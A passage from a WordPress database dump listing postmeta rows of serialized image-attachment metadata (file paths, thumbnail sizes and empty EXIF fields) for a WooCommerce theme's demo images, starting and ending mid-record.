pg\";s:5:\"width\";i:550;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-7-550x399.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(899,1179,'_wp_attachment_image_alt','a'),(900,1182,'_wp_attachment_image_alt','a'),(901,1183,'_wp_attached_file','2018/01/product6-gallery2.jpg'),(902,1183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product6-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product6-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product6-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(903,184,'_wp_attachment_image_alt','a'),(904,4242,'_wp_attachment_image_alt','a'),(905,4243,'_wp_attachment_image_alt','a'),(906,3511,'_wp_attachment_image_alt','o'),(907,4244,'_wp_attached_file','2018/03/landing-home10-img-1.jpg'),(908,4244,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:32:\"2018/03/landing-home10-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-home10-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"landing-home10-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-home10-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(909,3265,'_wp_attachment_image_alt','o'),(910,194,'_wp_attached_file','2018/01/comming-soon.jpg'),(911,194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1101;s:4:\"file\";s:24:\"2018/01/comming-soon.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"comming-soon-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"comming-soon-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"comming-soon-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"comming-soon-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"comming-soon-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"comming-soon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"comming-soon-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"comming-soon-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"comming-soon-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:25:\"comming-soon-1536x881.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:881;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"comming-soon-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"comming-soon-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"comming-soon-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:26:\"comming-soon-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(912,3512,'_wp_attached_file','2018/02/landing-brown.jpg'),(913,3512,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:691;s:6:\"height\";i:407;s:4:\"file\";s:25:\"2018/02/landing-brown.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"landing-brown-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-brown-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"landing-brown-600x353.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"landing-brown-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-brown-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"landing-brown-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"landing-brown-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"landing-brown-550x407.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:407;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"landing-brown-550x407.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:407;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"landing-brown-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"landing-brown-600x353.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-brown-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(914,3266,'_wp_attached_file','2018/02/h3-slide2-graphic2-1.png'),(915,3266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:129;s:4:\"file\";s:32:\"2018/02/h3-slide2-graphic2-1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic2-1-300x93.png\";s:5:\"width\";i:300;s:6:\"height\";i:93;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-150x129.png\";s:5:\"width\";i:150;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(916,1550,'_wp_attachment_image_alt','a'),(917,1552,'_wp_attached_file','2018/01/h7-img-8.jpg'),(918,1552,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:398;s:4:\"file\";s:20:\"2018/01/h7-img-8.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-8-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-8-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-8-550x398.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-8-550x398.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(919,3509,'_wp_attachment_image_alt','o'),(920,3510,'_wp_attachment_image_alt','o'),(921,3511,'_wp_attachment_image_alt','o'),(922,3512,'_wp_attachment_image_alt','o'),(923,1182,'_wp_attachment_image_alt','a'),(924,3513,'_wp_attached_file','2018/02/landing-about-us.jpg'),(925,3513,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:462;s:4:\"file\";s:28:\"2018/02/landing-about-us.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"landing-about-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-about-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"landing-about-us-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"landing-about-us-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-about-us-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"landing-about-us-768x444.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"landing-about-us-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"landing-about-us-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"landing-about-us-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"landing-about-us-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"landing-about-us-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"landing-about-us-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"landing-about-us-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(926,1183,'_wp_attachment_image_alt','a'),(927,905,'_wp_attachment_image_alt','o'),(928,906,'_wp_attached_file','2018/01/FODMAPsmall.jpg'),(929,906,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:867;s:4:\"file\";s:23:\"2018/01/FODMAPsmall.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"FODMAPsmall-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"FODMAPsmall-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"FODMAPsmall-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:24:\"FODMAPsmall-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"FODMAPsmall-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"FODMAPsmall-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1489399447\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(930,4243,'_wp_attachment_image_alt','a'),(931,4244,'_wp_attachment_image_alt','a'),(932,1184,'_wp_attached_file','2018/01/product6-gallery3.jpg'),(933,1184,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product6-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product6-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product6-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime